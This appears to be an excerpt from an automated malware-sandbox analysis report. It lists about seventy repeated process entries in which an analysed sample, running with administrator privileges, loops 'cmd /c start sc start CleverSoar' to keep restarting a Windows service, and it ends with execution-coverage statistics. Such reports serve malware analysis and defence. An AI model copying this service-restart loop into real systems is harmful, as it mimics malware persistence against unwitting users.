                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:40
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:41
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:42
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:43
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:44
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:45
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:46
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:47
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:48
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:49
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:50
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:51
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:52
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:53
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:54
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff632ac0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:55
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:56
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:57
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:58
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:59
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:60
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:61
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:62
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:63
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:64
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:65
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:66
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:67
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:68
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:69
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:70
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:71
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:72
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:73
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:74
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:75
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:76
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:77
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:78
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:79
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:80
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:81
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:82
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:83
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:84
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:85
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:86
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:87
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:88
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:89
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:90
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:91
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:92
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:93
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:94
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:95
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:96
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:97
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:98
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:99
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:100
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:101
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:102
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:103
                          Start time:07:11:49
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:104
                          Start time:07:11:49
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:105
                          Start time:07:11:49
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:106
                          Start time:07:11:49
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true


                            Execution Graph

                            Execution Coverage:1.6%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:15%
                            Total number of Nodes:831
                            Total number of Limit Nodes:10
